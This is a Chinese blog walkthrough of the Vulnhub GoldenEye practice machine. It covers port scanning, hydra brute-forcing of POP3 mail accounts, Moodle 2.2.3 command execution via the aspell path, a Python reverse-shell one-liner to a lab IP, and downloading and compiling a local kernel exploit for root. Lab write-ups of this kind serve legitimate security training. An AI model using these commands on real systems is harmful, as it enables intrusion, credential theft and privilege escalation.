goldeneye靶场

最新推荐文章于 2024-06-07 07:48:08 发布
置顶 最新推荐文章于 2024-06-07 07:48:08 发布
阅读量129 收藏
点赞数
分类专栏: 渗透测试靶场 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61899124/article/details/131069049
版权

目录

环境搭建

主机发现

端口扫描

信息收集

漏洞探测

漏洞利用

提权

环境搭建

设置为net模式开启虚拟机

主机发现

arp-scan -l

192.168.164.166

端口扫描

nmap -sS -sV -p- 192.168.164.166

信息收集

访问80端口

访问http://192.168.164.166/sev-home/

查看网页源代码发现terminal.js

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//

发现用户Boris、Natalya

对密码进行解密,InvincibleHack3r

尝试登录boris/InvincibleHack3r成功

pop3 服务配置为在非常高的非默认端口上

用hydra爆破一下POP3服务器的密码

hydra 192.168.164.166 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt

用户:boris 密码:secret1!
用户:natalya 密码:bird

使用nc连接pop3服务,登录这两个账号查看邮箱里面的邮件信息

nc 192.168.164.166 55007

登录另外一个账号看看

通过第二封邮件发现,要求我们在本地hosts中添加域名信息

用户名:xenia
密码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir

浏览器中打开http://severnaya-station.com/gnocertdir/

在登陆页面输入邮件中发现的用户和密码

登录成功

在"My profile"-->"Messages"-->选择"Recent conversations"(最近的对话)看到一个名为doak 的用户

用hydra爆破该用户的密码

hydra 192.168.164.166 -s 55007 pop3 -l "doak" -P /usr/share/wordlists/fasttrack.txt 

用户名:doak
密码:goat

登录该用户的邮箱

nc 192.168.164.166 55007

username: dr_doak
password: 4England!

用该账号登录http://severnaya-station.com/gnocertdir/login/index.php

发现一个 s3cret.txt文件

访问http://severnaya-station.com/dir007key/for-007.jpg

将图片下载下来

使用strings查看图片

strings for-007.jpg

将eFdpbnRlcjE5OTV4IQ==进行解码得到xWinter1995x!

管理员账户登录成功

漏洞探测

由于之前得知该网站的cms是Moodle的2.2.3版本,通过百度搜索可以知道该版本有个远程命令执行的漏洞

在利用的EXP中在POST的时候需要将拼写检查google spell换成PSpellSHell,原因是目标主机上不存在GCC编译,只有CC编译

在"Settings"-->"Site administration"-->"Plugins"-->"Text editors"-->"TinyMCE HTML editor" 修改PSpellSHel

在"Settings"-->"Site administration"-->"Server"-->"System paths"-->"Path to aspell" 进行命令执行

漏洞利用

使用python进行反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.164.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

开启监听4444端口,通过在blog中新建文章,随便输入字符,点击"Toggle Spellchecker"之后就会反弹到shell

nc -nvlp 4444

提权

获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

根据前面获取的系统版本- Linux ubuntu 3.13.0,在kali中查找相关漏洞

searchsploit Linux ubuntu 3.13.0

先将exp拷贝到home目录下

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/Desktop

由于EXP里面是使用gcc编译的 ,所以这里在靶机里面进行探测,发现没装gcc,但装了cc,先将EXP下载过来,然后进行修改

然后使用python创建一个服务,通过服务上传37292.c到靶机中

python -m http.server 8000

wget http://192.168.164.134:8000/37292.c

cc 37292.c -o ww

./ww

仙322
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3347
vulnhub靶场{GoldenEye-v1靶场实战}
vulnhub靶机GoldenEye实战(记录向)
kiwi的博客
02-01 356
接着我就去乱翻,翻到了一份邮件,是doak用户给我的。其实在另外一边我也尝试了搞25端口,因为我从来没有搞过25端口,按照老办法就是将扫描到的版本信息进行漏洞搜索,先问问度娘postfix smtp有什么漏洞,期间我查阅了大量资料,发现有一个漏洞可以进行邮件伪造,结合上面登录成功后的提示信息,我怀疑可能需要发送邮件给GNO,但是我哪里知道它的邮箱是什么,于是便在网上查阅信息,能否有一种方案能够通过ip发送,无奈,没有。我们改好了hosts文件,尝试访问登录,看起来像cms,但是我不确定,上。
GoldenEye-master
05-09
GoldenEyedos是一款十分强的的dos工具,特别是对于一些中小型网站。
GoldenEye:GoldenEye HTTP DoS 测试工具-开源
05-30
GoldenEye 是一个仅用于安全测试目的的 Python 应用程序! GoldenEye 是一个 HTTP DoS 测试工具。 被利用的攻击向量:HTTP Keep Alive + NoCache 请参阅自述文件了解更多详情。 请注意,这是 https://github.com/jseidl Jan Seidl 在 GitHub 上的原始版本的一个分支。 官方项目链接是 https://github.com/jseidl/GoldenEye License 该软件根据 GNU 通用公共许可证第 3 版 (GPLv3) 分发。免责声明:使用风险自负。 本软件由版权所有者或贡献者“按原样”提供,并提供任何明示或暗示的保证,包括但不限于适销性和针对特定用途的适用性的暗示保证。 在任何情况下,版权持有人或贡献者均不对任何直接、间接、附带、特殊、惩戒性或后果性损害负责。
goldeneye-50.zip
04-26
STK官方模型,非安装文件自带的,模型丰富。先在我上传的资源中下载STK models目录,然后在我上传的资源中找相应的模型。经测试,从STK8.0到STK11都可用。本资源为模型,分类air。
1、GoldenEye-靶机-百个项目计划
Labi的博客
01-14 1110
大家好,因为自己是一个刚入门网安不久的新人,现在想通过打一些靶机来进行学习,这里的计划是通过百个项目来进行实操,巩固自己的基础。发文也是记录一下自己的开始,文章会写的比较详细,让0基础的小白跟着做也会。本文仅用于技术讨论与研究,如用作非法用途作者概不负责。GoldenEye也是我们新手入门必打靶机,那我们就开始进入正文吧。
GoldenEye-v1靶场
qq_35355737的博客
06-05 1668
GoldenEye-v1靶场
VulnHub之GoldenEye靶场(2)
p_utao的博客
02-19 229
靶场信息: 地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 难度:简单 目标:root目录下flag.txt 文件 运行:VirtualBox(网络桥接) 信息收集 老规矩上来先扫描端口 常见端口开放25、80、110端口,访问网站,爆下目录(无果),随便爆破一下25端口的弱口令(无果) 中间件:apache 然后通过上面得提示访问/sev-home/这个目录,有登陆但是没有密码,这里我打算爆破来着,f12源代码里面有 有趣得对话,这里莫非是让
Goldeneye靶机实操
weixin_43999483的博客
02-03 736
Goldeneye靶机实操信息搜集webshell用户提权 新手上路 请多多指教 信息搜集 接好靶机 发现IP为:192.168.8.144 发现 80端口开着 试试打开 用户是Boris无疑,密码是&#开头,盲猜unicode格式,站长之家一波,百度翻译的插件也可以 由于系统大小写敏感用户名被坑了~~hhh 多次尝试用户名为:boris 密码不变 /sev-home/登录后台 发现有用的信息,pop3端口被开启,转了一圈chrome发现后台刻意留下的两个账号。 按照pop3端口被打开的思
记一次GoldenEye靶场渗透测试过程
c_programj的博客
09-16 1493
记一次GoldenEye靶场渗透测试过程 靶场下载连接: 链接:https://pan.baidu.com/s/1qSU-0h8S-HyV-tkhGvCe3A 提取码:n2hq 下载完成之后,在VMware直接打开虚拟机,选择该.ova文件即可。 KALI攻击机:192.168.43.126 GoldenEye靶机:192.168.43.27 一、信息收集 1、使用nmap进行信息收集,查找同网段下的主机:namp -sP 192.168.43.0/24 Nmap -sP 扫描所在网段存货主机(可以扫到所在
vulnhub靶场GoldenEye靶场
zzzzzzkeai的博客
11-17 236
vulnhub靶场GoldenEye靶场
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 2947
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
【vulhub靶场】GoldenEye
今天是几号的博客
04-04 860
pwd=90lq靶机:10.10.10.155关于复现,我把所有的试错过程也直接写上出了,尽管对于最终获得flag步骤有点多余TTY 是一个缩写,代表着 Teletype,它是一种早期的文字终端设备。在计算机早期,TTY是用于与计算机交互的主要方式之一,用户可以通过键盘输入指令并在屏幕上看到计算机的响应。如今,TTY通常被用来描述一个连接到终端设备的进程或会话。TTY 可以在本地终端、SSH 连接、串口连接等各种情况下使用,
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8279
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 915
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
应用程序加固的优势及其在移动应用安全中的重要性
gulu230220的博客
06-05 404
通过提升应用程序的安全性、防止应用程序被篡改、提高应用程序的抗攻击能力、保护应用程序的知识产权和提升用户体验和信任度,加固技术可以有效保障移动应用的安全和稳定,为用户提供更加安全和可靠的移动应用服务。通过加固应用程序的安全漏洞和弱点,加固技术可以防止黑客利用已知的攻击手段和工具对应用程序进行攻击,提高应用程序的安全性和稳定性。通过加密和混淆应用程序的源代码和关键算法,加固技术可以防止黑客和竞争对手获取应用程序的源代码和商业机密,保护开发者的创新成果和商业利益。应用程序加固能够有效提升移动应用程序的安全性。
《软件定义安全》之二:SDN/NFV环境中的安全问题
最新发布
wuxiaobing1234的博客
06-07 735
南向协议主要侧重于南向接口上的数据转发、网络配置、数据平面信息收集等功能。OpenFlow协议OpenFlow是SDN的标志性技术,他体现了SDN的核心思想:控制与转发分离。它通过流表控制技术支持用户对数据流行为进行控制。OpenFlow交换机根据流表来转发数据包,代表数据转发平面;控制器通过全网络视图来实现管控功能,其控制逻辑表示控制平面。OpenFlow协议的发展演进一直都围绕着两个方面,一方面是控制平面的增强,让系统功能更丰富、更灵活;
跨区域文件管控过程中 如何保障安全和效率?
文件数据安全交换
06-03 600
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
Linux系统下的ddos攻击
05-11
DDoS攻击(分布式拒绝服务攻击)是一种网络攻击,旨在使网络服务或网站无法正常运行。在Linux系统下,攻击者可以使用一些工具来执行DDoS攻击,包括: 1. Hping3:一个流量生成器和分析工具,可以模拟各种类型的网络流量,并可用于执行DDoS攻击。 2. LOIC:低轨道离子炮(Low Orbit Ion Cannon)是一种开源网络压力测试工具,也可以用于执行DDoS攻击。 3. GoldenEye:一个Python编写的HTTP DoS测试工具,可以用于向目标服务器发送大量HTTP请求,从而导致服务器宕机。 为了防止这种攻击,可以采取以下措施: 1. 安装防火墙:防火墙是保护网络免受未经授权访问和攻击的基本措施。 2. 使用负载均衡器:负载均衡器可以确保网络流量在不同服务器之间进行平衡分配,从而减轻任何单个服务器的负载压力。 3. 使用CDN服务:CDN(内容分发网络)是一种分布式网络架构,可以将内容缓存在多个服务器上,从而提高页面加载速度,减少对单个服务器的负载压力。 4. 使用DDoS保护服务:DDoS保护服务可以检测和过滤DDoS攻击流量,并确保只有合法流量可以到达服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值